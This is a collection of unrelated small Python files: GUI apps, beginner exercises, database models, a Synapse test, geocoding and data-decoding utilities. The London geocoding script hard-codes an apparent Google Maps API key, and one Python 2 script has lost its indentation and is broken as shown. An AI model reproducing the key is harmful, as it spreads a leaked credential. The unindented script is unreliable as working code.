        label.setPixmap(pixmap_girl)
        label.setMaximumSize(pixmap_girl.width(), pixmap_girl.height())
        row_two.addWidget(label)
        row_two.addWidget(QLabels[3])
        top_five_btn = QPushButton("Top 5 sales")
        top_five_btn.pressed.connect(self.top_five)
        top_five_btn.setMaximumWidth(100)
        grid.addLayout(row_one)
        grid.addLayout(row_two)
        grid.addWidget(top_five_btn)
        self.setLayout(grid)
        return self
    def __fill_grid(self):
        """Gets the information from the employee table and the employe_sales table needed to present
        each employee in the grid layout
        """
        QLabels = []
        emp_info = ""
        data = self.db_controller.employee_info()
        for row in range(len(data)):
            count = self.db_controller.employees_company_count(data[row][0])
            # NOTE(review): assumes column 2 is NULL for managers — confirm schema.
            role = "Manager" if data[row][2] == None else "Sales"
            emp_info = f"Name: {data[row][1]}\nRole: {role}\nApp-code's sold: {data[row][3]}\nCompanies: {count}"
            label = QLabel(emp_info)
            label.setStyleSheet("""
                color: rgb(54, 54, 54);
                font-family: Arial, Helvetica, sans-serif;
                font-size: 15px;
            """)
            QLabels.append(label)
        return QLabels
    def top_five(self):
        """Open the QWidget that presents the user with the top five list of sales
        """
        self.w = TopFive(self.db_controller)
        self.w.show()
|
# for i in range(1,10):
# if (i<4) :
# print(i)
# elif (i>7) :
# print("우리집강아지")
# else :
# print("복슬강아지")
# a = 1
# while a <= 10:
# if a % 2 == 0 :
# print(a)
# a = a + 1
# print("sum =", "sum")
# a=10
# while True :
# print(a)
# a = a + 1
# if a > 10 :
# break;
# a = 0
# cnt = 0
# while a < 10 :
# a += 1
# if (a % 3 == 0) :
# cnt += 1
# continue;
# print(a, end=" ")
# print()
# print("3의 배수의 개수 :",cnt)
# k = int(input("!값 = "))
# m = 1
# print(k, "! = ", end = "", sep="")
# while k > 1 :
# m = m * k
# print(k,"*",end="", sep="")
# k -= 1
# print("1 =", m)
# Barista loop: keep announcing that the order for customer "홍길동" is
# ready until the user answers with the matching name, giving up (and
# printing a refusal) after five attempts.
customer = "홍길동"
na = 0
cnt = 0
while na != customer :
    print("{}님 주문하신 커피가 준비되었습니다.".format(customer))
    na = input("당신의 이름은?")
    cnt += 1
    if cnt == 5 :
        break;
print("안해 ^^ㅣ발")
|
# -*- coding:utf-8 -*-
r"""Identify objects
This module provides a object to represent all Senators and Federal Deputies elected in previously elections, with his
unique identifiers based on a .csv file located in IDENTITY_FILE location.
This module also provide a way to update the content of the IDENTITY_FILE, in the purpose of this usage a copy is made
located in IDENTITY_FILE_UPDATED location.
"""
import csv
from dateutil.parser import parse
from .deputy import Deputy
from .senator import Senator
__author__ = 'Rebeca Bordini <bordini.rebeca@gmail.com>'
IDENTITY_FILE = './initial-data/identity.csv'
IDENTITY_FILE_UPDATED = './generated-data/identity_final.csv'
class Identity:
    """Registry of Senators and Federal Deputies elected in previous elections.

    Loaded from IDENTITY_FILE on construction; updates are appended to the
    copy at IDENTITY_FILE_UPDATED.
    """

    def __init__(self):
        """Load every candidate row from IDENTITY_FILE into the registry."""
        self.deputies = []
        self.senators = []
        with open(IDENTITY_FILE, 'rt') as csvfile:
            reader = csv.DictReader(csvfile, delimiter=';')
            for row in reader:
                # Deputies and senators carry different identifier columns.
                if row.get('cam:ideCadastro'):
                    self.add_deputy(Deputy(row))
                if row.get('sen:CodigoParlamentar'):
                    self.add_senator(Senator(row))

    def add_deputy(self, deputy):
        """Register a deputy in the deputies list."""
        self.deputies.append(deputy)

    def add_senator(self, senator):
        """Register a senator in the senators list."""
        self.senators.append(senator)

    def find(self, name):
        """Return the first congressman (deputy or senator) with this name, else None."""
        for congressman in self.deputies + self.senators:
            if congressman.name == name:
                return congressman
        return None

    def get_all_deputies(self):
        """All registered deputies."""
        return self.deputies

    def get_all_senators(self):
        """All registered senators."""
        return self.senators

    def update_data(self, uri, data):
        """Append one congressman row to IDENTITY_FILE_UPDATED.

        One row is written per call; no explicit save step is needed.

        :param uri: unique identifier of the current congressman
        :param data: Elected instance providing name and birth_date
        """
        with open(IDENTITY_FILE_UPDATED, 'a') as csvfile:
            writer = csv.writer(csvfile, delimiter=';')
            born = parse(data.birth_date)
            writer.writerow([uri, '', born.strftime('%Y-%m-%d'), '', data.name, '', '', '', ''])
|
# coding: utf-8
# comeca com consoante
# raquel ambrozio
# NOTE: Python 2 script (raw_input / print statement). Counts how many
# entered words start with a consonant, stopping at the "***" sentinel.
palavra = ""
palavras = []
comeca_consoantes = 0
while palavra != "***":
    palavra = raw_input()
    # NOTE(review): an empty input line raises IndexError on palavra[0] — confirm inputs are non-empty.
    if palavra[0] not in "AaEeIiOoUu*":
        comeca_consoantes += 1
print "Palavras: %d" % comeca_consoantes
|
# Builds a string T by repeatedly wrapping 'b' with the cyclic patterns
# a_c / c_a / b_b until T reaches length N, then prints the number of
# wraps i if the input S equals T exactly, otherwise -1.
N = int(input())
S = input()
T = 'b'
i = 0
len_T = 1
while len_T < N:
    i += 1
    r = i % 3
    if r == 1:
        T = 'a' + T + 'c'
    elif r == 2:
        T = 'c' + T + 'a'
    else:
        T = 'b' + T + 'b'
    # Each wrap adds one character on both ends.
    len_T += 2
# N with the wrong parity never matches (len_T overshoots N).
if len_T != N or S != T:
    print(-1)
else:
    print(i)
|
########################################
###          IMPORT MODULES          ###
########################################
import pandas as pd
import googlemaps
# SECURITY NOTE: hard-coded Google Maps API key committed to source —
# it should be rotated and loaded from the environment instead.
gmaps = googlemaps.Client(key='AIzaSyAj5JExaDTeWni5CWXLr8AK4j6Bh8EJDAk')
########################################
###      LOOP THROUGH BOROUGHS       ###
########################################
# The 32 London boroughs plus the City of London.
london_boroughs = ['Barking and Dagenham',
                   'Barnet',
                   'Bexley',
                   'Brent',
                   'Bromley',
                   'Camden',
                   'City of London',
                   'Croydon',
                   'Ealing',
                   'Enfield',
                   'Greenwich',
                   'Hackney',
                   'Hammersmith and Fulham',
                   'Haringey',
                   'Harrow',
                   'Havering',
                   'Hillingdon',
                   'Hounslow',
                   'Islington',
                   'Kensington and Chelsea',
                   'Kingston upon Thames',
                   'Lambeth',
                   'Lewisham',
                   'Merton',
                   'Newham',
                   'Redbridge',
                   'Richmond upon Thames',
                   'Southwark',
                   'Sutton',
                   'Tower Hamlets',
                   'Waltham Forest',
                   'Wandsworth',
                   'Westminster']
# Geocode every borough and collect its (lat, lng) pair.
borough_coordinates = dict()
for location in london_boroughs:
    # BUG FIX: the original concatenated the borough name directly onto
    # "Borough of London..." (e.g. "BarnetBorough of London"); insert the
    # separating ", " so the geocoder receives a well-formed address.
    geocode_result = gmaps.geocode(location + ', Borough of London, London, United Kingdom')
    coords = geocode_result[0].get('geometry').get('location')
    lat = coords.get('lat')
    lng = coords.get('lng')
    borough_coordinates[location] = (lat, lng)
df = pd.DataFrame.from_dict(borough_coordinates, orient='index')
df.reset_index(level=0, inplace=True)
df.columns = ['Borough','Latitude','Longitude']
########################################
###            STORE DATA            ###
########################################
df.to_csv('dataset/borough_coordinates.csv', sep=',', encoding='utf-8', index=False)
|
# NOTE: Python 2 script (print statement / raw_input). Each raw_input()
# pauses until the user presses Enter, pacing the joke delivery.
print 'What do you get when you cross a snowman with a vampire?'
raw_input()
print 'Frostbite!'
raw_input()
print 'What do desntists call an astronaut\'s cavity?'
raw_input()
print 'A black hole!'
raw_input()
print 'Knock knock'
raw_input()
print 'Who\'s there?'
raw_input()
print 'Interrupting cow'
raw_input()
# Trailing comma keeps the cursor on the same line (Python 2).
print 'Interrupting cow wh',
print 'MOO!'
from base import Pedsnet_base, Pcornet_base
from sqlalchemy import Column, Integer, String, Numeric, Date, TIMESTAMP, Float
class DeathPedsnet(Pedsnet_base):
    """SQLAlchemy model for the PEDSnet `death` table (one row per death cause)."""
    __tablename__ = 'death'
    # placeholder schema until actual schema known
    __table_args__ = {'schema': 'pedsnet_schema'}
    cause_concept_id = Column(Integer)
    cause_source_concept_id = Column(Integer)
    cause_source_value = Column(String(256))
    death_date = Column(Date, nullable=False)
    death_datetime = Column(TIMESTAMP(False), nullable=False)
    death_impute_concept_id = Column(Integer, nullable=False)
    death_type_concept_id = Column(Integer, nullable=False)
    # BUG FIX: SQLAlchemy's Float keyword is lowercase `precision`; the
    # original `Float(Precision=64)` raises TypeError at class definition.
    death_age_in_months = Column(Float(precision=64))
    cause_concept_name = Column(String(512))
    cause_source_concept_name = Column(String(512))
    death_impute_concept_name = Column(String(512))
    death_type_concept_name = Column(String(512))
    site = Column(String(32))
    death_cause_id = Column(Integer, primary_key=True, nullable=False)
    site_id = Column(Integer)
    person_id = Column(Integer, nullable=False)

    def __init__(self, cause_concept_id, cause_source_concept_id, cause_source_value,
                 death_date, death_datetime, death_impute_concept_id, death_type_concept_id,
                 death_age_in_months, cause_concept_name, cause_source_concept_name,
                 death_impute_concept_name, death_type_concept_name, site, death_cause_id,
                 site_id, person_id):
        """Populate every mapped column from positional arguments (order matches the column list)."""
        self.cause_concept_id = cause_concept_id
        self.cause_source_concept_id = cause_source_concept_id
        self.cause_source_value = cause_source_value
        self.death_date = death_date
        self.death_datetime = death_datetime
        self.death_impute_concept_id = death_impute_concept_id
        self.death_type_concept_id = death_type_concept_id
        self.death_age_in_months = death_age_in_months
        self.cause_concept_name = cause_concept_name
        self.cause_source_concept_name = cause_source_concept_name
        self.death_impute_concept_name = death_impute_concept_name
        self.death_type_concept_name = death_type_concept_name
        self.site = site
        self.death_cause_id = death_cause_id
        self.site_id = site_id
        self.person_id = person_id

    def __repr__(self):
        """Multi-line human-readable summary of the key identifying fields."""
        return "Death Id - '%s': " \
               "\n\tPerson Id: '%s'" \
               "\n\tDeath Date: '%s'" \
               "\n\tDeath Age: '%s'" \
               "\n\tCause: '%s'" \
               "\n\tSite: '%s'" \
               % \
               (self.death_cause_id, self.person_id, self.death_datetime,
                self.death_age_in_months, self.cause_concept_name, self.site)
class DeathPcornet(Pcornet_base):
    """SQLAlchemy model for the PCORnet `death` table (one row per patient)."""
    __tablename__ = 'death'
    # placeholder schema until actual schema known
    __table_args__ = {'schema': 'pcornet_schema'}
    death_date = Column(Date)
    death_date_impute = Column(String(2))
    death_match_confidence = Column(String(2))
    death_source = Column(String(2), nullable=False)
    patid = Column(String(256), primary_key=True, nullable=False)
    site = Column(String(32), nullable=False)
    def __init__(self, death_date, death_date_impute, death_match_confidence,
                 death_source, patid, site):
        """Populate every mapped column from positional arguments."""
        self.death_date = death_date
        self.death_date_impute = death_date_impute
        self.death_match_confidence = death_match_confidence
        self.death_source = death_source
        self.patid = patid
        self.site = site
    def __repr__(self):
        """Multi-line human-readable summary keyed by patient id."""
        return "Person - '%s': " \
               "\n\tDeath date: '%s'" \
               "\n\tSource: '%s'" \
               "\n\tSite: '%s'" \
               % \
               (self.patid, self.death_date, self.death_source, self.site)
class DeathCause(Pcornet_base):
    """SQLAlchemy model for the PCORnet `death_cause` table.

    Composite primary key: (death_cause, death_cause_code,
    death_cause_source, death_cause_type, patid).
    """
    __tablename__ = 'death_cause'
    # placeholder schema until actual schema known
    __table_args__ = {'schema': 'pcornet_schema'}
    death_cause = Column(String(8), primary_key=True, nullable=False)
    death_cause_code = Column(String(2), primary_key=True, nullable=False)
    death_cause_confidence = Column(String(2))
    death_cause_source = Column(String(2), primary_key=True, nullable=False)
    death_cause_type = Column(String(2), primary_key=True, nullable=False)
    patid = Column(String(256), primary_key=True, nullable=False)
    site = Column(String(32), nullable=False)
    def __init__(self, death_cause, death_cause_code, death_cause_confidence,
                 death_cause_source, death_cause_type, patid, site):
        """Populate every mapped column from positional arguments."""
        self.death_cause = death_cause
        self.death_cause_code = death_cause_code
        self.death_cause_confidence = death_cause_confidence
        self.death_cause_source = death_cause_source
        self.death_cause_type = death_cause_type
        self.patid = patid
        self.site = site
    def __repr__(self):
        """Multi-line human-readable summary keyed by patient id."""
        return "Person - '%s': " \
               "\n\tDeath Cause: '%s'" \
               "\n\tCause Code: '%s'" \
               "\n\tCause Source: '%s'" \
               "\n\tCause Type: '%s'" \
               "\n\tSite: '%s'" \
               % \
               (self.patid, self.death_cause, self.death_cause_code,
                self.death_cause_source, self.death_cause_type, self.site)
|
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tests import unittest
from twisted.internet import defer
from mock import Mock
from synapse.handlers.directory import DirectoryHandler
from synapse.types import RoomAlias
from tests.utils import setup_test_homeserver
class DirectoryHandlers(object):
    """Minimal handler container exposing only the directory handler for these tests."""
    def __init__(self, hs):
        self.directory_handler = DirectoryHandler(hs)
class DirectoryTestCase(unittest.TestCase):
    """ Tests the directory service. """
    @defer.inlineCallbacks
    def setUp(self):
        # Federation transport is mocked; query handlers registered by the
        # homeserver are captured so tests can invoke them directly.
        self.mock_federation = Mock(spec=[
            "make_query",
            "register_edu_handler",
        ])
        self.query_handlers = {}
        def register_query_handler(query_type, handler):
            self.query_handlers[query_type] = handler
        self.mock_federation.register_query_handler = register_query_handler
        hs = yield setup_test_homeserver(
            http_client=None,
            resource_for_federation=Mock(),
            replication_layer=self.mock_federation,
        )
        hs.handlers = DirectoryHandlers(hs)
        self.handler = hs.get_handlers().directory_handler
        self.store = hs.get_datastore()
        # Aliases on the local "test" server and a remote one.
        self.my_room = RoomAlias.from_string("#my-room:test")
        self.your_room = RoomAlias.from_string("#your-room:test")
        self.remote_room = RoomAlias.from_string("#another:remote")
    @defer.inlineCallbacks
    def test_get_local_association(self):
        # A locally created alias resolves without touching federation.
        yield self.store.create_room_alias_association(
            self.my_room, "!8765qwer:test", ["test"]
        )
        result = yield self.handler.get_association(self.my_room)
        self.assertEquals({
            "room_id": "!8765qwer:test",
            "servers": ["test"],
        }, result)
    @defer.inlineCallbacks
    def test_get_remote_association(self):
        # Remote aliases are resolved via a federation "directory" query.
        self.mock_federation.make_query.return_value = defer.succeed(
            {"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
        )
        result = yield self.handler.get_association(self.remote_room)
        self.assertEquals({
            "room_id": "!8765qwer:test",
            "servers": ["test", "remote"],
        }, result)
        self.mock_federation.make_query.assert_called_with(
            destination="remote",
            query_type="directory",
            args={
                "room_alias": "#another:remote",
            },
            retry_on_dns_fail=False,
            ignore_backoff=True,
        )
    @defer.inlineCallbacks
    def test_incoming_fed_query(self):
        # Inbound federation queries are served by the captured handler.
        yield self.store.create_room_alias_association(
            self.your_room, "!8765asdf:test", ["test"]
        )
        response = yield self.query_handlers["directory"](
            {"room_alias": "#your-room:test"}
        )
        self.assertEquals({
            "room_id": "!8765asdf:test",
            "servers": ["test"],
        }, response)
|
# -*- coding: utf-8 -*-
__author__ = "radek.augustyn@email.cz"
if __name__ == "__main__":
    # Set up logging first so modules imported below can log at import time.
    import sharedtools.log as log
    log.createLogger("Deploy")
    import argparse
    from updatemode import UPDATE_MODE
    from config import Config
    from directoryprocessor import DirectoryProcessor
    parser = argparse.ArgumentParser(description='Deploy python project.')
    parser.add_argument("--inputDir", type=str, help="Input directory with source project.", default="C:/ms4w/Apache/htdocs/Generalizace/m3")
    parser.add_argument("--outputDir", type=str, help="Output directory.", default="c:/temp/built")
    args = parser.parse_args()
    log.logger.info("Python Deploy Builder")
    # Deploy overwrites any existing output, then reports statistics.
    processor = DirectoryProcessor(args.inputDir, args.outputDir, Config())
    processor.mode = UPDATE_MODE.OVERWRITE
    processor.deploy()
    processor.printStatistics()
import numpy as np
import operator
def itemgettergeneral(keys, listdict, cast_to_np_array=False):
    """Extract the value(s) for `keys` from every dict in `listdict`.

    Due to a numpy ufunc limitation (cannot construct a ufunc with more
    than 32 operands) this uses list(map(...)) rather than np.vectorize.

    Parameters
    ----------
    keys : hashable or list of hashable
        A single dict key, or a list of keys (yields one tuple per record,
        ordered like `keys`).
    listdict : list of dict
        Records to extract from.
    cast_to_np_array : bool
        If True, return the result as a numpy array.

    Returns
    -------
    list or numpy.ndarray
        One entry per input record.
    """
    # Fix: removed the redundant in-function `import numpy` / `import
    # operator` — the module-level imports already provide both.
    if isinstance(keys, list):
        getter = operator.itemgetter(*keys)
    else:
        getter = operator.itemgetter(keys)
    outdata = list(map(getter, listdict))
    if cast_to_np_array:
        return np.array(outdata)
    return outdata
class Wavelenght:
    """Wavelength grid on [start_wav, end_wav) at a fixed resolution.

    Provides nearest_index() to map a physical wavelength onto the grid.
    (Class name spelling is kept for backward compatibility.)
    """

    def __init__(self, name, start_wav, end_wav, resolution):
        self.name = name
        # end_wav is exclusive, as with numpy.arange.
        self.wavelenghts = np.arange(start_wav, end_wav, resolution)
        self.start_wav = start_wav
        self.end_wav = end_wav
        self.resolution = resolution

    def __str__(self):
        return f'Wavelenght(name="{self.name}",start={self.start_wav},end={self.end_wav},res={self.resolution})'

    def nearest_index(self, value, verbose=False):
        """Index of the grid point closest to `value`; ValueError outside range."""
        if not (self.start_wav <= value <= self.end_wav):
            raise ValueError(f'{value} is outside Wavelenght range [{self.start_wav},{self.end_wav}]')
        idx = (np.abs(self.wavelenghts - value)).argmin()
        if verbose:
            print(f'closest point to Wavelenght(start={self.start_wav},end={self.end_wav},res={self.resolution})')
        return idx
# (A previous itemgetter-based variant benchmarked the same, ~29 µs/loop.)
def dictextractor(keys, dic):
    """Return the sub-dict of `dic` restricted to `keys` (KeyError if one is missing).

    Idiom fix (PEP 8 E731): the original assigned a lambda to a name;
    a def gives the same callable with a proper name and docstring.
    """
    return {k: dic[k] for k in keys}
# python definition of DATA_QUALITY_INDEX field
# Ordered (field name, {digit: meaning}) pairs; one character of the
# DATA_QUALITY_INDEX string corresponds to each field, in this order.
DATA_QUALITY_INDEX = [
    ('Dark Scan',{
        '0' : 'shutter not engaged',
        '1:' : 'shutter engaged'}),  # NOTE(review): key '1:' looks like a typo for '1' — confirm against the PDS label definition
    ('Temperature 1',{
        '0' : 'Temperature does not exceed 15 deg C threshold.',
        '1' : 'Temperature exceeds 15 deg C threshold but less than 25 deg C threshold.',
        '2' : 'Temperature exceeds 25 deg C threshold but less than 40 deg C threshold.',
        '3' : 'Temperature exceeds 40 deg C threshold.'}),
    ('Temperature 2',{
        '0' : 'Temperature does not exceed 15 deg C threshold.',
        '1' : 'Temperature exceeds 15 deg C threshold but less than 25 deg C threshold.',
        '2' : 'Temperature exceeds 25 deg C threshold but less than 40 deg C threshold.',
        '3' : 'Temperature exceeds 40 deg C threshold.'}),
    ('Grating Temperature',{
        '0' : 'Temperature does not exceed 15 deg C threshold.',
        '1' : 'Temperature exceeds 15 deg C threshold but less than 25 deg C threshold.',
        '2' : 'Temperature exceeds 25 deg C threshold but less than 40 deg C threshold.',
        '3' : 'Temperature exceeds 40 deg C threshold.'}),
    ('Anomalous Pixels',{
        '0' : 0,
        '1' : 1,
        '2' : 2,
        '3' : 3,
        '4' : 4,
        '5' : 5,
        '6' : 6,
        '7' : 7,
        '8' : 8,
        '9' : 9}),
    ('Partial Data',{
        '0' : 'No partial data.',
        '1' : 'Partial data exists.'}),
    ('Saturation',{
        '0' : 'No pixels saturated.',
        '1' : 'Saturated pixels exist.'}),
    ('Low Signal Level',{
        '0' : 'Signal level not below -32768 threshold.',
        '1' : 'Signal level below -32768 threshold.'}),
    ('Low VIS Wavelength Uncertainty',{
        '0' : 'Uncertainty not above TBD threshold at low wavelengths.',
        '1' : 'Uncertainty above TBD threshold at low wavelengths.'}),
    ('High VIS Wavelength Uncertainty',{
        '0' : 'Uncertainty not above TBD threshold at high wavelengths.',
        '1' : 'Uncertainty above TBD threshold at high wavelengths.'}),
    ('UVVS Operating',{
        '0' : 'UVVS is not scanning during readout.',
        '1' : 'UVVS is scanning during readout.'}),
    ('UVVS Noise Spike',{
        '0' : 'No noise spike detected.',
        '1' : 'Noise spike detected.'}),
    ('SPICE Version Epoch',{
        '0' : 'No SPICE',
        '1' : 'Predict',
        '2' : 'Actual'}),
    ('Dark Saturation',{
        '0' : 'All pixels in data record contain at least four unsaturated dark frames.',
        '1' : 'One or more pixels in data record contain three or fewer unsaturated dark frames.'}),
    ('SpareO',{ '0' : 'None'}),
    ('SpareP',{ '0' : 'None'})
]
def extract_data_quality_index(dqi):
    """Decode a record's DATA_QUALITY_INDEX string into {field_name: int}.

    '-' placeholder characters are dropped; field names come from
    DATA_QUALITY_INDEX (spaces replaced by underscores), in order.
    """
    digits = [c for c in dqi['DATA_QUALITY_INDEX'] if c != '-']
    names = [name.replace(" ", "_") for name, _ in DATA_QUALITY_INDEX]
    return dict(zip(names, [int(c) for c in digits]))
def np_to_sql_arr(x):
    """Tuple of Python floats from iterable x; fill values (>= 1.0e32) become None."""
    out = []
    for el in x:
        out.append(None if el >= 1.0e32 else el.astype(float))
    return tuple(out)
# add to the table_data
def extract_regridded_sp(sp, wav_grid):
    """Regrid the IOF and photometric IOF spectra of record `sp` onto `wav_grid`.

    Uses linear interpolation with extrapolation beyond the native channel
    range; each regridded spectrum is converted to a SQL-friendly tuple
    (fill values become None).
    """
    import scipy.interpolate
    wav = sp['CHANNEL_WAVELENGTHS']
    regridded = {}
    for out_key, in_key in (('photom_iof_sp_2nm', 'PHOTOM_IOF_SPECTRUM_DATA'),
                            ('iof_sp_2nm', 'IOF_SPECTRUM_DATA')):
        f = scipy.interpolate.interp1d(wav, sp[in_key], kind='linear', fill_value='extrapolate')
        regridded[out_key] = np_to_sql_arr(f(wav_grid))
    return regridded
def fov_coord_extractor(sp,
                        shapelyze=True,
                        geoalchemy2ize=True,
                        srid=4326,
                        coordinates_names = None):
    """Extract center and field-of-view footprint coordinates from record *sp*.

    Reads two coordinate "SET" arrays from sp (defaulting to
    TARGET_LONGITUDE_SET / TARGET_LATITUDE_SET). Returns None when any value
    is a sentinel (>= 1.0e32) or NaN. Otherwise returns a dict with 'center'
    (the first lon/lat pair) and 'fov' (a closed 5-point ring built from
    pairs 1,3,2,4,1 -- presumably reordering the corners into polygon
    winding order; TODO confirm against the data format spec).
    """
    if not coordinates_names:
        coordinates_names = ['TARGET_LONGITUDE_SET','TARGET_LATITUDE_SET']
    coord = np.array([l for l in operator.itemgetter(*coordinates_names)(sp)],dtype=np.float32)
    # If there is a NaN in the coord, return none.
    # It is not possible to use it!!
    if ( coord >= 1.0e+32).any() or np.isnan(coord).any() :
        return None
    else:
        # zip(*coord) pairs longitudes with latitudes element-wise.
        coord_tuples = np.array([(i,j) for i,j in zip(*coord)])
        coord_dict = {'center': coord_tuples[0]}
        coord_dict['fov'] = coord_tuples[[1,3,2,4,1],:]
        if shapelyze:
            import shapely.geometry
            # Encode as EWKT strings ("SRID=...;POINT(...)" / POLYGON).
            coord_dict['center'] = 'SRID={};{}'.format(srid,shapely.geometry.Point(*coord_dict['center']).wkt)
            coord_dict['fov'] = 'SRID={};{}'.format(srid,shapely.geometry.Polygon(coord_dict['fov']).wkt)
        if geoalchemy2ize:
            from geoalchemy2 import shape
            # NOTE(review): when shapelyze is True the values here are EWKT
            # *strings*, but geoalchemy2.shape.from_shape expects shapely
            # geometry objects -- confirm this branch is only used with
            # shapelyze=False, or convert before calling from_shape.
            coord_dict['center'] = shape.from_shape(coord_dict['center'],srid=srid)
            coord_dict['fov'] = shape.from_shape(coord_dict['fov'],srid=srid)
        return coord_dict
"""
logic operation
and, or, not
T: True
F: False
T and T = T
T and F = F
F and T = F
F and F = F
T or T = T
T or F = T
F or T = T
F or F = F
not T = F
not F = T
"""
def logic_and(a, b):
    """Logical AND, preserving Python's short-circuit operand semantics."""
    return b if a else a
def logic_or(a, b):
    """Logical OR, preserving Python's short-circuit operand semantics."""
    return a if a else b
def logic_not(a):
    """Logical NOT: True for a falsy argument, False for a truthy one."""
    return False if a else True
|
import random
myList=['aa', 'bb', 'cc', 'dd', 'ee', 'ff', 'gg', 'hh', 'ii', 'jj', 'kk', 'll']
print 'This is my list= ', myList
print
randomIndex=random.randint(0, len(myList)-1)
print 'this is my random index= ', randomIndex
currentIndex=randomIndex
while True:
if randomIndex in range(0,len(myList)):
currentIndex=randomIndex
print 'this is my element in array= ',myList[currentIndex]
print
answer=raw_input('Press n for next, p for previous, or q to quit= ')
answer=str(answer)
if answer=='n' and currentIndex >= 0:
nextIndex=currentIndex+1
randomIndex=nextIndex
print 'this is next element= ', myList[nextIndex], 'and index number= ', nextIndex
print
elif answer=='p' and currentIndex < len(myList)-1:
prevIndex=currentIndex-1
randomIndex=prevIndex
print 'this is previous element= ', myList[prevIndex], 'and previous number= ', prevIndex
print
elif answer=='q':
break
else:
print 'You havent choice right option, please re-enter again'
print
continue
|
from django.contrib import admin
# Register your models here.
from porters.models import Porter
class PorterAdmin(admin.ModelAdmin):
    # Default admin options for Porter; add list_display/search_fields here.
    pass
# Make Porter editable in the Django admin site.
admin.site.register(Porter, PorterAdmin)
|
import time
# Simple three-question CLI quiz; state lives in the module-global `score`.
score = 0
name = str(input("What's your name? "))
print("Welcome, " + name + " to the quiz!\n")
def score_plus():
    """Add one point to the module-global score and print the new total."""
    global score
    score = score + 1
    print("Your score: ", score)
def score_minus():
    """Subtract one point from the module-global score and print the new total."""
    global score
    score = score - 1
    print("Your score: ", score)
def q1():
    """Question 1: update the score via score_plus/score_minus, then chain to q2()."""
    print("\n1. What is El Capitan?")
    time.sleep(1)
    print("a) An operating system for Windows")
    print("b) An operating system for MAC")
    print("c) A third-party application\n")
    answer = str(input("What's the right answer: "))
    if answer == "b":
        print("Well Done, that's correct!")
        score_plus()
    else:
        print("Sorry, that was the wrong answer!")
        score_minus()
    print()
    q2()
def q2():
    """Question 2: update the score, then chain to q3()."""
    print("\n2. What is apple's latest device?")
    time.sleep(1)
    print("a) iPhone")
    print("b) MacBook Pro")
    print("c) iPod Touch\n")
    answer = str(input("What's the right answer: "))
    if answer == "b":
        print("Well Done, that's correct!")
        score_plus()
    else:
        print("Sorry, that was the wrong answer!")
        score_minus()
    print()
    q3()
def q3():
    """Question 3: update the score; final question, so no further chaining.

    NOTE(review): unlike q1/q2 there is no trailing blank-line print() here.
    """
    print("\n3. Who is the CEO of Apple?")
    time.sleep(1)
    print("a) Anamitra Dey")
    print("b) Bill Gates")
    print("c) Steve Jobs\n")
    answer = str(input("What's the right answer: "))
    if answer == "c":
        print("Well Done, that's correct!")
        score_plus()
    else:
        print("Sorry, that was the wrong answer!")
        score_minus()
# Kick off the quiz chain: q1 -> q2 -> q3 (q1 calls q2, q2 calls q3).
q1()
print("\nThank you for participating in the quiz!")
|
from django.conf.urls import url
from . import views
app_name = 'chat'
# URL routes for the chat app.
urlpatterns = [
    url(r'^$', views.index, name='index'),
    # NOTE(review): 'about' and 'pusher_auth' lack the trailing '$' anchor the
    # other routes use, so they also match any sub-path -- confirm intended.
    url(r'^about/', views.AboutView.as_view(), name='about'),
    url(r'^pusher_auth/', views.pusher_auth, name='pusher_auth'),
    url(r'^find_users/$', views.find_users, name='find_users'),
    url(r'^get_conversations/$', views.get_conversations, name='get_conversations'),
    url(r'^get_messages/$', views.get_messages, name='get_messages'),
    url(r'^login/$', views.LoginView.as_view(), name='login'),
    url(r'^logout/$', views.logout, name='logout'),
    url(r'^post_message/$', views.post_message, name='post_message'),
]
|
'''
Sequential Search
**Computational complexity**:
    - best case = 1
    - worst case = n
    - average case = n/2
**Advantages**:
    - simple to implement
    - suitable for small data sets
**Disadvantages**:
    - high computational complexity
    - slow for large data sets
    - generally inefficient
'''
def busca_sequencial_for(lista, valor_procurado):
    """Return True if valor_procurado occurs in lista, scanning left to right."""
    for elemento in lista:
        if elemento == valor_procurado:
            return True
    return False
def busca_sequencial_while(lista, valor_procurado):
    """Sequential search with a while loop.

    Returns True if valor_procurado occurs in lista, False otherwise.
    """
    indice = 0
    found = False
    while indice < len(lista) and not found:
        if lista[indice] == valor_procurado:
            # BUG FIX: this used to be ``found == True`` (a comparison, not an
            # assignment) and the index was never advanced on a match, so a
            # successful search looped forever and the function could only
            # ever return False.
            found = True
        else:
            indice += 1
    return found
# test
lista = [1, 2, 32, 8, 17, 19, 42, 13, 0]
print(busca_sequencial_for(lista, 13))
print(busca_sequencial_while(lista, 3))
# love python
print("\nlove python")
# The built-in membership operator performs the same linear scan.
print(42 in lista)
|
import tkinter as tk
import tkinter.messagebox as messagebox
from tkinter import StringVar
from jiami import *
from test import Post, test_token
import os
# Root window and static widgets.
app = tk.Tk()
app.title('到梦空间')
app.geometry('1060x800')
# Login credential entries (top left).
tk.Label(app, text='User name:', font=('Arial', 14)).place(x=10, y=0)
tk.Label(app, text='Password:', font=('Arial', 14)).place(x=10, y=35)
entry_usr_name = tk.Entry(app, font=('Arial', 14))
entry_usr_name.place(x=120, y=0)
entry_usr_pwd = tk.Entry(app, font=('Arial', 14), show="*")
entry_usr_pwd.place(x=120, y=35)
# Activity-id inputs: query (id1), sign-up (id2), cancel (id3).
tk.Label(app, text='输入查询id', font=('Arial', 14)).place(x=500, y=0)
tk.Label(app, text='输入报名id', font=('Arial', 14)).place(x=500, y=35)
tk.Label(app, text='输入退出id', font=('Arial', 14)).place(x=500, y=70)
id1 = tk.Entry(app, font=('Arial', 14), width=7)
id1.place(x=620, y=0)
id2 = tk.Entry(app, font=('Arial', 14), width=7)
id2.place(x=620, y=35)
id3 = tk.Entry(app, font=('Arial', 14), width=7)
id3.place(x=620, y=70)
class Main(Post):
    """GUI controller: wraps the Post API client and renders its results
    into the module-level Tk widgets (entries id1/id2/id3, window app)."""
    def read(self):
        """Load cached session data (token, display name, uid) from a.ini."""
        with open('a.ini', 'r', encoding='utf-8') as f:
            self.token = f.readline().rstrip()
            self.name = f.readline().rstrip()
